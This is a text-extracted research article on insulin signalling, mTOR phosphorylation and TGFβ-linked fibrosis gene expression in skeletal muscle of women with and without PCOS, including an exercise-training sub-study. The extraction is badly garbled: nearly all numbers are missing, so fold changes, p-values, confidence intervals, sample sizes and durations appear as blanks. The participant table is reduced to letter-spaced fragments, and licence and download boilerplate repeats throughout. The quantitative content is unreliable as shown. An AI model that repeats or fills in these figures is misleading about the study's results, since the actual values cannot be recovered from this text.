insulin signalling ( , ), with reduced activation of key signalling proteins such as insulin receptor substrate (irs) / , protein kinase b (pkb)/akt and its downstream substrate akt substrate kda (as ) ( , , ). while similar defects in insulin stimulated signalling have been found in women with pcos ( , ), these signalling defects are not consistent ( ) and unable to explain the pcos-specific ir. raja-khan et  al. ( ) has proposed an alternative hypothesis that dysfunctional transforming growth factor β (tgfβ) signalling regulated by fibrillins and latent tgfβ-binding proteins may lead to increased organ stroma or fibrosis. this may predispose women with pcos to morbidities like insulin resistance, as tgfβ can directly impact glucose uptake and insulin signalling ( , , ) and/or create a physical barrier to glucose uptake into muscle ( ). the role of aberrant extracellular matrix (ecm) remodelling or tissue fibrosis and tgfβ in the aetiology of pcos-related insulin resistance has not been investigated. we therefore hypothesised that the women with pcos compared to bmi-matched controls would be associated with unique defects in insulin signal transduction and altered ecm and tgfβ signalling network gene expression. we aimed to examine the activation/phosphorylation of proteins in both the proximal and distal parts of the insulin signalling cascade before and min into a euglycaemic–hyperinsulinaemic insulin clamp and gene expression of the ecm and tgfβ ligand signalling network in women with or without pcos (spanning lean and obese bmis). our secondary aim was to investigate the impact of exercise training on the aberrant skeletal muscle insulin signalling and gene expression of the ecm and tgfβ ligand signalling network. materials and methods participants the participants that are included in this secondary analysis are a subset of women who participated in our previously published studies ( , , , ) and consented to muscle biopsies. specifically, we included fifty-nine (fig. and table ) of the original cohort of premenopausal women with or without pcos. the women were categorised according to pcos status and matched (group means) for bmi generating four groups: (i) lean with pcos (lp), (ii) lean without (control; lc), (iii) overweight to obese with pcos (owp) and (iv) overweight to obese without pcos (control; owc). confirmation of pcos diagnosis was undertaken by expert endocrinologists (skh, aej and hjt) based on rotterdam criteria. the southern health research advisory and ethics committee approved the study and participants gave written informed consent. the clinical trial registration number is isrctn . study design for this ancillary mechanistic observational study and interventional sub-study (fig. ) data were collected this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle : at baseline in all women (after three-month washout of relevant medications) and following weeks of exercise training (subgroup of women with overweight/ obesity n = per group). data were collected in the follicular phase of the menstrual cycle in control women and wherever feasible in the women with pcos. end- point analyses were done by staff blinded to group and intervention stage. exercise intervention the subgroup of overweight to obese participants consisting of women with pcos (n = ) and without pcos (controls; n = ) undertook weeks of supervised, personalised progressive, aerobic exercise training on a motorised treadmill as described previously. briefly, participants attended three h sessions each week, which sequentially alternated between moderate-intensity (walking or jogging at % of vo peak or – % hrmax) and high-intensity interval training (six -min intervals with -min recovery period at approximately – % of vo peak or approximately – % hrmax). the intensity and/or duration of each participant’s exercise session were individually progressed and increased over the duration of the intervention ( , , ). clinical and biochemical measurements participants were assessed for anthropometric measures including body weight, height, body composition, abdominal visceral fat and subcutaneous fat and, waist, and hip circumference as table . insulin sensitivity was determined using the euglycaemic-hyperinsulinaemic clamp technique ( mu/m /min) as previously reported ( ). blood samples were batch analysed for fasting glucose, total cholesterol, high-density lipoprotein cholesterol, low-density lipoprotein cholesterol, triglycerides, insulin, testosterone and hba c. low- density lipoprotein and the homeostatic model insulin resistance assessment (homa) were calculated ( ). thigh muscle (vastus lateralis) samples were obtained by percutaneous biopsy under local anaesthesia ( ) immediately prior to and min into the insulin clamp. muscle biopsies were immediately frozen in liquid nitrogen and then stored at − °c for subsequent analysis. figure  consort flow diagram detailing the sample size and prior research studies for the secondary analysis reported in the current study. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : ta b le   p ar ti ci p an t ch ar ac te ri st ic s an d t h e im p ac t o f w ee ks o f ae ro b ic e xe rc is e tr ai n in g o n t h e tw o o ve rw ei gh t gr o u p s o f w o m en . pa ra m et er lc lp o w c o w p o w c pr e- tr ai n in g o w c po st -t ra in in g o w p pr e- tr ai n in g o w p po st -t ra in in g p ar ti ci p an ts p er g ro u p (n ) a ge (y )  ±   a  ±   ab  ±    ±    ±    ±   b m i ( kg /m )  ±   ab  ±   ab  ±    ±    ±    ±    ±    ±   w h r . ( . ) . ( . ) . ( . ) . ( . ) d xa   b o d y fa t (% ) ( ) ab ( ) ab ( ) ( ) ( ) ( ) ( ) ( )   fa t m as s (k g) .  ±   . ab .  ±   . ab .  ±   . .  ±   . ( ) ( ) e ( ) ( ) c t   a b d o m in al s c f (c m )   ±  ab   ±  ab   ±    ±  ( ) ( ) e ( ) ( )   a b d o m in al v f (c m )  ±   a b  ±   a b   ±    ±  ( ) ( ) ( ) ( ) f g lu co se h o m eo st as is   fb g (m m o l/ l) .   ±  . b c . ± . .   ±  . .   ±  . . ( . ) . ( . ) . ( ) . ( . )   fp in su lin (p m o l/ l) .   ±  . a b .   ±  . ab .  ±   . b .  ±   . ( ) h ( ) ( ) ( ) e   c la m p m in p la sm a in su lin (p m o l/ l) .  ±   . ab .  ±   . a b .  ±   .  ±   ( ) ( ) ( ) ( )   h o m a -i r . ( ) ab . ( ) ab . ( ) b . ( ) . ( ) h . ( ) . ( ) . ( )   g ir (m g/ m in /m ) ( ) ab c ( ) b ( ) b ( ) ( ) h ( ) e ( ) ( ) e li p id p ro fil es   c h o le st er o l ( m m o l/ l) .   ±  . .   ±  . .   ±  . .   ±  . . ( ) . ( ) . ( ) . ( )   tr ig ly ce ri d es (m m o l/ l) .   ±  . b .   ±  . b .   ±  . b . ± . . ( ) . ( ) . ( ) . ( ) e, g   ld l/ h d l . ( ) ab . ( ) ab . ( ) . ( ) . ( ) i . ( ) . ( ) . ( ) a n d ro ge n s   te st o st er o n e (p m o l/ l) .  ±   . b .  ±   . .  ±   . b .  ±   . . ( ) h . ( ) . ( ) . ( )   sh b g (m m o l/ l)  ±   a b  ±   a b  ±    ±   ( ) i ( ) ( ) ( )   fa i ( % ) . ( ) ab . ( ) b . ( )b . ( ) . ( ) h . ( ) . ( ) . ( ) fi tn es s   v o p ea k (m l/ kg /m in ) . ( ) ab . ( ) ab . ( ) . ( ) . ( . ) . ( . ) d . ( . ) . ( . ) d p c o s d ia gn o si s   n ih p ar ti ci p an ts (n )j   r o tt er d am p ar ti ci p an ts (n )k d at a ar e fr o m t h e su b se t o f w o m en in cl u d ed in t h is a n ci lla ry a n al ys is ( , ) a n d p re se n te d a s m ea n  ±  s. d . o r w h en d at a w er e lo g tr an sf o rm ed t h ey a re p re se n te d a s a b ac k tr an sf o rm ed m ea n (± s. d . as a c v % ). st at is ti ca l d iff er en ce s ar e re p o rt ed f o r b et w ee n g ro u p s (l c , l p , o w c a n d o w p ) a ft er a d ju st in g fo r ag e m ee ti n g b o th p  <   . an d c le ar e ff ec ts a t th e % c i: a s ig n ifi ca n tl y d iff er en t fr o m o ve rw ei gh t co n tr o ls p  ≤   . ; b si gn ifi ca n tl y d iff er en t fr o m o ve rw ei gh t p c o s p  ≤   . ; c s ig n ifi ca n tl y d iff er en t fr o m le an p c o s p  ≤   . . s ta ti st ic al d iff er en ce s ar e re p o rt ed f o r tr ai n in g su b -g ro u p : d si gn ifi ca n tl y d iff er en t fr o m p re -t ra in in g p  ≤   . ; e si gn ifi ca n tl y d iff er en t fr o m p re -t ra in in g p  ≤   . ; f s ig n ifi ca n tl y d iff er en t ch an ge b et w ee n g ro u p s p  ≤   . ; g tr en d f o r d iff er en ce f ro m p re -t ra in in g p  <  . ; h si gn ifi ca n tl y d iff er en t fr o m p c o s (u n tr ai n ed v al u es ) p ≤ . ; i s ig n ifi ca n tl y d iff er en t fr o m p c o s (u n tr ai n ed v al u es ) p  ≤   . ; j n u m b er o f p ar ti ci p an ts in t h e gr o u p c o n si d er ed t o m ee t n ih d ia gn o st ic c ri te ri a; k n u m b er o f p ar ti ci p an ts in t h e gr o u p c o n si d er ed t o m ee t r o tt er d am d ia gn o st ic c ri te ri a. b m i, b o d y m as s in d ex ; c t, c o m p u te r to m o gr ap h y; d xa , d u al x -r ay a b so rp ti o m et ry ; f a i, fr ee a n d ro ge n in d ex ; g ir -c la m p , g lu co se in fu si o n r at e; h d l, h ig h -d en si ty li p o p ro te in ; h o m a -i r , h o m eo st as is m o d el o f in su lin r es is ta n ce ( ) ; l c , l ea n c o n tr o l; ld l, lo w -d en si ty li p o p ro te in ; l p , l ea n p c o s; n /a , n o t ap p lic ab le ; o w c , o ve rw ei gh t co n tr o l; o w p , o ve rw ei gh t p c o s; s c f, s u b cu ta n eo u s fa t; s h b g , st er o id h o rm o n e- b in d in g gl o b u lin ; v f, v is ce ra l f at ; w h r , w ai st -t o -h ip r at io . this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle : muscle protein extraction and western blot analyses equal quantities of protein, extracted as previously reported ( , , ), were resolved by sds-page (bio-rad, criterion tgx gels), transferred to a pvdf membranes (bio-rad, turbo-blot) using optimised protocols, blocked with tbst ( mm tris; % tween ) containing % skim milk, washed times for mins in tbst and immunoblotted overnight at °c with primary antibodies ( , , ) targeting total and phospho-proteins including glucose transporter (glut ), insulin receptor (ir), insulin receptor substrate (irs- ), protein kinase b/akt, akt substrate kda (as ), typical and atypical phospho-protein kinase c (pkcδ/θ; pkcλ/ζ), mechanistic target of rapamycin (mtor), glycogen synthase kinase α (gsk) and glyceraldehyde phosphate dehydrogenase (gapdh) as the loading control (supplementary table , see section on supplementary materials given at the end of this article). after washing and incubation with horseradish peroxidase-conjugated secondary antibody (perkin elmer) in % skim milk and tbst, the immune-reactive proteins were detected with enhanced chemiluminescence (amersham biosciences) on the versadoc mp (bio- rad) and quantified by densitometry (quantity-one; bio- rad). all phospho-protein data were normalised to their total protein, unless otherwise indicated (figs , and supplementary figs , ) to control for loading variability. rna extraction and tgfβ network/tissue fibrosis gene expression analysis total rna was isolated from the muscle ( – mg) using trizol and cleaned up with rneasy total rna kit columns (qiagen). the total rna content and purity were established by measuring absorbance at and nm (nanodrop; eppendorf). ten micrograms of each rna sample were then dnase treated using dnase (thermo fisher scientific) described in detail in ( ). relative gene expression was quantified by real- time pcr using the qiagen rt custom profiler array for fibrosis pathway-related genes. ng of dnase-treated rna was used for cdna, diluted in and amplified for genes plus housekeeping genes. cdna was generated according to manufacturer’s guidelines with modifications ( ) using µl of superscript rt iii (thermo fisher scientific). custom array primers were designed against the human mrna sequences for the corresponding genes in the ref seq database (supplementary table ). all reactions were performed according to the sybr- green™ cycle threshold (ct) method using a biorad cfx real-time pcr detection. thermocycling conditions for the pcr included min at °c followed by cycles of s at °c and min at °c. melt curve analysis from to °c ( s per °c) was performed to ensure a single defined peak for each amplified product. comparative ct calculations for the gene expression were performed by subtracting the mean gapdh and actb ct values from ct values of the gene of interest to derive a Δct value. the expression of the genes was calculated according to the formula: −Δct. statistical analysis all statistical analyses were conducted using mixed modelling procedures (proc mixed) in statistical analysis system (version . , sas institute). data, unless otherwise stated, were log transformed before analysis to overcome heteroscedastic issues and presented as a back-transformed mean with standard deviation (s.d.) as a coefficient of variation (cv; %). for the cross-sectional study separate models were generated to compare differences in variables between groups including participant characteristics, gene expression, where the fixed effects in the model estimated the main effects of pcos (pcos/control) and obesity (bmi - lean (< kg/m ) and overweight (> kg/m ) as per ( )) status as nominal variables and the modifying effect of age a linear numeric variable. to estimate the main effects of pcos and bmi on the fold change (with an s.d. as expressed cv %) in normalised protein phosphorylation induced by min of insulin infusion the fixed effects were again pcos and bmi status as nominal variables interacted with baseline phosphorylation levels, age and change plasma insulin concentrations (linear numeric variables). for the exercise training sub- study, a similar approach was adopted and the main effects of pcos (pcos/control) and training status (untrained vs trained) on participant characteristics, gene expression, baseline protein abundance and insulin-induced changes phospho-protein abundance were determined with the fixed effects in the model where pcos and training status as nominal variables and interacted with the dependent variables baseline value. all models estimated between group differences of variables or changes in variables as a percentage and presented with % confidence intervals ( % ci). pearson correlations (proc corr; sas v . ) were used explore relations between gir and a select number of variables. significance was accepted when p < . . as an a priori decision, we ran a parallel analysis on our mixed this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : model outcomes using a bayesian method that has no or minimally informed prior or belief about the effects or standard deviations or magnitude-based inferences ( , ). this method allowed us to make probabilistic assertions about the true magnitudes of effects using the non-clinical version of magnitude-based inference, according to which an effect was deemed unclear if the % ci spanned substantial positive and negative values of the smallest worthwhile effect ( . times between participant s.d.); all other effects were deemed clear and assigned the magnitude of the analysed effect, along with the chances that the effect was substantial and/or trivial ( ). the magnitude-based inference component of our combined statistical approach was used to provide a standardised effect size (< . , trivial; . – . , small; . – . moderate, . – large) and to account for inflation of error arising from the large number comparisons investigated. we only reported effects that met our significance criteria (p < . ) and were deemed to have a clear standardised-effect by magnitude-based inference for the % ci of the analysed effect. results all clinical data differentiating the different groups of women from the subset of participants used in this analysis and the beneficial impact of exercise training are detailed in table . between-group differences for insulin-stimulated phosphorylation signalling protein abundance and gene expression are reported as fold changes with % ci that includes the adjustments for the appropriate covariates. insulin signalling abundance of key phospho-proteins in the insulin signalling pathway across the distal and proximal components, as well as the insulin signalling pathway regulators were analysed across the four groups of women to identify early insulin signalling defects in skeletal muscle that align with pcos-specific insulin resistance (fig. and supplementary fig. ). overall min of insulin infusion stimulated phosphorylation of the signalling proteins across all groups where figure  normalised fold change of insulin stimulated ( min) phosphorylation of key proteins in the insulin signalling pathway and insulin signalling pathway regulators. (a) insulin receptor (ir), (b) insulin receptor substrate serine (irs ), (c) protein kinase b/akt serine (akt), (d) akt threonine , (e) atypical protein kinase b (pkc (ζ/λ)), (f) typical pkc (δ/θ), (g) mechanistic target of rapamysin (mtor), (h) akt substrate kda (as ), (i) glycogen synthase kinase ser / . covariate adjusted statistical difference reported as: *significant fold increase with insulin stimulation p <  . (and clear effect at %cl), **significant fold increase with insulin stimulation p <  . (and clear effect at %cl), psignificant impact of pcos p <  . (and clear effect at %cl), osignificant impact of obesity p <  . (and clear effect at %cl). presented as mean ± s.d. (data presented as back transformed and the s.d. was derived as a coefficient of variation (%)), p <  . . this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle : ir-tyr / , akt-ser , akt-thr , mtor, as -thr and gsk-ser / underwent significant/meaningful increases (p < . and large effects) ranging from . to . -fold (fig. ). only one signalling protein, mtor demonstrated altered phosphorylation, after adjustments for covariates, where obesity and pcos reduced phosphorylation. specifically, pcos resulted in a moderate . fold (( % ci . – . ), p = . ) reduction of phosho-mtor compared to non-pcos women. similarly, obesity also induced a moderate . fold (( % ci . – . ) p = . ) compared to lean women. taken together these data suggest altered insulin-sensitive metabolic signalling distal to akt which may impact the translocation of the glucose transporter protein glut and therefore glucose uptake into muscles. we found no differences in protein expression of glut between the groups (data not shown). gene expression for tissue fibrosis the relative gene expression of col a , col a , dcn, igf , lox, ltbp , tgfb and tgfbr was impacted by both obesity and/or pcos status with small to moderate between-group differences (fig. ) suggesting aberrant signalling via the tgfβ ligand signalling network, establishing a pro-fibrotic gene program. specifically, col a and a were . fold ( % ci: . , . ; p = . ) and . fold ( % ci: . , . %; p = . ) higher in owp compared to owc. the owc group had higher ( . fold; p < . ) expression of both col a and a compared to lc. the ltbp gene expression was highest in the overweight groups, with owp having significantly higher ( . fold, % ci: . , . ; p = . ) expression than lc. for dcn ( . fold, % ci: . , . ; p = . ) and lox ( . fold % ci: . , . ; p = . ) the owp group had higher gene expression than owc. while dcn in lc was lower ( . fold, p = . ) and lox was . fold higher (p = . ) than owc. the tgfβ signalling-related gene expression was higher in the owp group where tgfb and tgfbr expression were . fold ( % ci: . , . ; p = . ) and . fold ( % ci: . , . , p = . ) higher in owp compared to lc respectively. tgfbr gene expression was . fold higher in owp vs owc (p = . ). in contrast, igf gene expression was lowest in owc being . fold ( % ci: . , . ; p = . ) compared to lc, with owc also being lower ( . fold % ci: . , . ; p = . ) than owp. overall gir negatively correlated with body composition (bmi; android, gynoid and visceral fat; and dxa-derived fat free mass and appendicular muscle mass) and fai (supplementary table ). in contrast, gir was positively correlated with aerobic fitness and shbg concentrations (supplementary table ). these overall associations were due to the stronger correlations observed in the women with pcos compared to controls across the bmi categories. gir was also positively correlated to the fold change in insulin-stimulated ( min) phospho- mtor (r = . , p = . ) in the pcos group only and negatively correlated to tgfbr gene expression overall (r = − . , p = . ). impact of exercise in the women (with overweight/obesity) who participated in the -week treadmill exercise intervention a number of changes in clinical features (table ), insulin signalling (fig. and supplementary fig. ) and tgfβ signalling network gene expression (fig. ) were observed. training- induced differential responses to min of insulin stimulation, where only phospho-aktser and phospho- gskser were impacted differently by the training intervention. owp demonstrated a small attenuation in phosphorylation of phospho-aktser ( . fold % ci: . , . ; p = . ) and phospho-gskser ( . fold % ci: , . ; p = . ) compared to owc women, respectively. surprisingly, very few phospho- proteins demonstrated clear with-in group impacts of training. specifically, training resulted in a large augmentation of insulin-stimulated phospho-as of . fold ( % ci: . , . ; p = . ) from pre- to post-training in owp. on the other hand, training resulted in a small attenuation of phospho-gskser ( . fold % ci: . , ; p = . ) from pre- to post-training in owp group. we also reported small to moderate differential training-induced changes in relative gene expression (fig. ) of genes for ecm deposition, col a , col a , dcn and lox, which only occurred in owp women. col a gene expression increased by . fold ( % ci: . , . ; p = . ) from pre- to post-training in the owp women. similarly exercise training induced col a and lox gene expression increases of . fold ( % ci: . , . ; p = . ) and . fold ( % ci: . , . ; p = . ), respectively. the exercise-induced changes in gir did not correlate with any fold changes in insulin-induced increases/ decreases in protein phosphorylation nor changes in gene expression (supplementary table ) in any group. however, changes in fai were negatively correlated with the training-induced changes in gir (r = − . ; p = . ) in women with pcos, indicating increased insulin sensitivity was associated with a decreased fai. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : figure  relative gene expression of the tissue fibrosis (tgfβ) pathway. gene expression was normalised to the mean of gapdh and actb (the housekeeping genes) expression. (a) col a , (b) col a , (c) dcn, (d) igf , (e) lox, (f) smad , (g) tgf i , (h) ltbp , (i) tgfb , (j) tgfb , (k) tgfb , (l) tgfbr . these data are from a subset of women (n =  ) ( ). covariate adjusted statistical difference reported: a- significantly different from overweight control p <  . (and clear effect at %cl), b- significantly different from overweight pcos p <  . (and clear effect at %cl). data are presented as mean ± s.d. (data presented as back transformed and the s.d. was derived as a coefficient of variation (%)). figure  normalised fold change of insulin stimulated ( min) phosphorylation of key proteins in the insulin signalling pathway before and after weeks of intensified aerobic exercise training in overweight women with and with pcos. (a) insulin receptor (ir), (b) insulin receptor substrate serine (irs ), (c) protein kinase b/akt serine (akt), (d) akt threonine , (e) atypical protein kinase b (pkc (ζ/λ)), (f) typical pkc (δ/θ), (g) mechanistic target of rapamysin (mtor), (h) akt substrate kda (as ), (i) glycogen synthase kinase ser / . these data are from a subset of women (n =  pcos, n =  control) from ( , ). covariate adjusted statistical difference reported as: *significant fold increase with insulin stimulation p <  . (and clear effect at %cl), **significant fold increase with insulin stimulation p <  . (and clear effect at %cl), asignificantly different between group training response p <  . (and clear effect at %cl), bsignificantly with in group training response p <  . (and clear effect at %cl). presented as mean ± s.d. (data presented as back transformed and the s.d. was derived as a coefficient of variation (%)). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle : discussion taking a novel sampling approach, this study demonstrated dysfunction in insulin signalling after min of insulin infusion during an insulin clamp in women with pcos across a range of bmis. this dysfunction was distal to akt/pkb and associated with end-clamp insulin sensitivity. specifically, reduced insulin stimulated phospho-mtor was associated with pcos and obesity status. a -week exercise intervention improved, but did not rescue insulin sensitivity in owp compared to owc women and these improvements were accompanied by augmented phospho-as and phospho-mtor (trend) but attenuated phospho-akt-ser and phosho- gskser / in pcos. we found genes in the tgfβ regulated tissue fibrosis pathway that encode ecm components (col a , col a ), enzymes in the collagen deposition and assembly (lox, dcn), ligands (tgfb ) and their receptor were elevated in owp. after the -week training intervention col a , col a , dcn and lox were differentially regulated in the owp compared to owc women. overall women with pcos, especially the owp showed a gene expression pattern conducive to greater tgfβ ligand-driven ecm or fibrosis, even after the exercise training intervention. defects in insulin signalling in skeletal muscle are well documented for insulin-resistant conditions ( ), including pcos ( , ). our data significantly expands this work exploring possible defects in both proximal and distal components of this pathway in lean and overweight controls and women with pcos. in agreement with the literature ( , , ) our data demonstrated an obesity-induced defect in the insulin receptor activation of signalling, due to differential phosphorylation of tyr / between the lean and overweight groups with no impact of pcos status. when obesity (bmi) and prevailing insulin concentrations were accounted for, the obesity-driven differences were negated and the lack of impact of pcos status remained (fig. ), as previously reported ( , ). our data allowed us to explore the hypothesis of diamanti-kandarakis and dunaif ( ) where there may be a pcos-specific serine kinase targeting irs / . mtor could be this kinase ( , ), however, our in vivo data contrast with this hypothesis as no insulin- stimulated change was detected in any group. these data suggest that signalling defects are more likely distal to the ir and irs / in skeletal muscle of women with pcos. a key finding of this study, was that our in vivo data show reduced phosphorylation of mtor occurred in pcos-specific manner and implicates this protein figure  training response of relative gene expression in the tissue fibrosis (tgfβ) pathway for women with and without pcos after weeks of intensified exercise training. (a) col a , (b) col a , (c) dcn, (d) igf , (e) lox, (f) smad , (g) tgf i , (h) ltbp , (i) tgfb , (j) tgfb , (k) tgfb , (l) tgfbr . these data are from a subset of women (n =  pcos, n =  control) from ( , ). presented as mean ± s.d. (data presented as back transformed and the s.d. was derived as a coefficient of variation (%)). covariate adjusted statistical difference reported: *significant within group training effect p <  . (and clear effect at %cl), asignificant difference between owc and owp p <  . (and clear effect at %cl). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : complex as a mechanism of insulin resistance in pcos (supplementary table ). these data differ from a recent study ( ) investigating insulin signalling defects in lean hyperandrogenic women with pcos, where defects in adenosine monophosphate kinase (ampk) and pyruvate dehydrogenase (pdh) activity explain insulin resistance. this work was not without limitations (e.g. lean women only, no fitness assessments ( )) and did not consider mtor, the alternate metabolic signalling pathway. mtor signalling via its complex mtorc (mtor + raptor) is associated with nutrition-regulated anabolic processes in skeletal muscle ( ). more recently the mtorc (mtor+rictor) has been linked to insulin resistance in skeletal muscle in vitro and animal models in the presence of reduced phospho-akt ser , altered intracellular glucose handling, irrespective of levels of phospho-akt-thr and glut vesical trafficking ( ). the women with pcos from the exercise training sub- group had improved, but not rescued mtor signalling responses to insulin, which did not correlate with training-induced changes in gir (supplementary table ). as we were unable to quantify the different mtor complexes, due to tissue availability, we could not establish if mtorc was associated with this pcos- specific reduction in insulin signalling and sensitivity. more research is needed to understand the pcos-specific mtor downregulation and its role in the intrinsic insulin resistance in skeletal muscle. as , gsk , typical pkc (δ/θ) and atypical pkc (λ/ξ) insulin-stimulated phosphorylation were surprisingly similar between groups but there were trends for obesity to reduce signalling. glut is considered important in skeletal muscle insulin and exercise stimulated glucose uptake ( ) where our data for protein expression of glut (data not shown) surprisingly found no differences between the four groups of women. while these data align with previous work suggesting comparable levels of glut between women with and without pcos ( ), our methodology (centrifuged muscle lysate and heating prior to gel separation) may mask/underestimate any true differences and effects. the -week exercise intervention clearly impacted the dysfunctional phosphorylation of three signalling proteins. specifically, phospho-as , a key protein in glut vesicle translocation ( ), was improved in the owp women, aligning with other training studies (in males ( )). on the other hand phospho- akt and –gsk (regulation of glycogen synthesis ( )) demonstrated contradictory reductions post-training in the owp women. this was unexpected, especially the reduced phospho-akt; however, there is the non-linearity of signalling via akt ( ) and thus limiting its impact on any training induced improvements of gir in owp. the training intervention did not induce significant changes in the other signalling proteins, each having a vital role in regulating insulin-stimulated glucose uptake either as downstream substrates of akt or independently including regulation of glut vesicle translocation (atypical pkc (λ/ξ) ( )) and integration lipid availability to reduce glucose uptake (typical pkc (δ/θ) ( , )). in summary, our data suggest that the reduced early activation of proteins below akt are linked to pcos–specific insulin resistance. this is despite the alteration but not normalisation of phosphorylation defects by training. overall, these data and that of others ( , ) suggests insulin signalling defects in skeletal muscle account for some insulin resistance, but additional molecular mechanisms are responsible for the pcos-specific insulin resistance and its synergy with obesity. there is emerging data suggesting that at least tgfβ is an exercise induced adipokine that promotes insulin sensitivity ( ). however, these data are currently biased to male samples and mainly rodent physiology but they do further support the notion that tgfβ pathways are important for insulin sensitivity and response to exercise. human data supporting ( , ) induction of insulin resistance provide a direct role of tgfβ signalling, via the smad proteins in skeletal muscle glucose uptake. in the context of the aetiology of pcos, our new hypothesis ( ) of tgfβ ligand mediated excess stromal deposition or fibrosis, may apply beyond the ovary to metabolic tissues like skeletal muscle in women with pcos, predisposing them to insulin resistance. dysfunctional tgfβ or tgfβ superfamily ligand signalling may be involved as anti-müllerian hormone (amh) ( ) and tgfβ ( ) are elevated in women with pcos. these ligands act via their respective receptors to activate the smad signalling proteins that are not only negative regulators of akt ( ) and mtor ( ), but are key signals in ecm deposition. thus, this pathway is a plausible contributor to dysfunctional insulin signalling and reduced sensitivity in pcos. our gene expression data of elevated collagen, ecm deposition enzymes and tgfβ r gene expression (pro-fibrotic gene profile), elevated ligands (amh ( ) and tgfβ ( )) and our previously reported high tissue density (elevated hounsfield units) in thigh skeletal muscle from ct analysis ( ), support the notion that tgfβ ligand signalling and tissue fibrosis may be involved in pcos-specific skeletal muscle insulin resistance ( ). this may occur not only via smad protein signalling interfering with akt this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle : and/or mtor signalling, but also via increased ecm possibly limiting insulin and glucose movement across the interstitial space. interestingly, exercise training had no effect on this network of genes except lox, col a and a where expression was augmented. this provides a possible mechanism for resistance to insulin sensitising therapies in pcos, which aligns with other research ( ) and warrants further investigation. therefore, our data support our hypothesis ( ) and allows us to expand our understanding of insulin resistance in skeletal muscle in pcos and its attenuated response to therapy. we now propose that the tgfβ ligand signalling via smad-mtor/smad-akt pathways plus tissue fibrosis is mechanistically involved in pcos-specific insulin resistance, its synergy with obesity (fig. ) and possible resistance to therapy. our study limitations included a small sample size ( , , ) due to the invasive procedures used to obtain tissue samples. as this was an ancillary analysis tissue availability was limited (additional analysis via immunoblotting of tgfβ signalling) and not collected to for immunohistochemistry. we acknowledge that the sample size was limited for the exercise arm of the study, which may have limited power to detect exercise- induced alterations in fibrosis in the owc group. alternatively, we could also speculate that perhaps on owc exercise does not re-model the ecm unlike the owp. however, the strengths of this work were the use of gold-standard methods to assess insulin sensitivity in a community-recruited, well-characterised population of lean and overweight women with or without pcos. we cannot rule out contributions of differential body composition and other systemic factors (supplementary tables and ) to insulin resistance in women with pcos. specifically, fai index correlated strongly (negatively) with end clamp gir in women with pcos but not controls, but were no longer significant when lp and owp were considered separately (r ~ − . , p > . ). additionally, exercise-induced reduction in fai correlated strongly with the increases in gir for the sub-group of pcos women. these data suggest a role of hyperandrogenism in pcos-specific ir. however, fai did not correlate with any insulin signalling or tgfβ and tissue fibrosis gene expression data in this study. fai is a calculated variable dependant on shbg concentrations, which are impacted by insulin resistance ( ). taken together with most literature ( , ) this study could not establish the role of hyperandrogenism in causing insulin resistance in pcos via peripheral tissue insulin signalling and fibrosis. conclusions our data provide new insights into pcos-specific insulin resistance and the associated early signalling events in skeletal muscle highlighting a role for aberrant mtor signalling. these data also support our hypothesis that tgfβ superfamily ligands, their signalling and tissue fibrosis are involved in pcos-specific insulin resistance, figure  hypothetical signalling pathway showing that dysfunctional tgfβ network signalling regulates tissue fibrosis and may play a role in this pcos-specific insulin resistance and its limited response to exercise training. this work is licensed under a creative commons 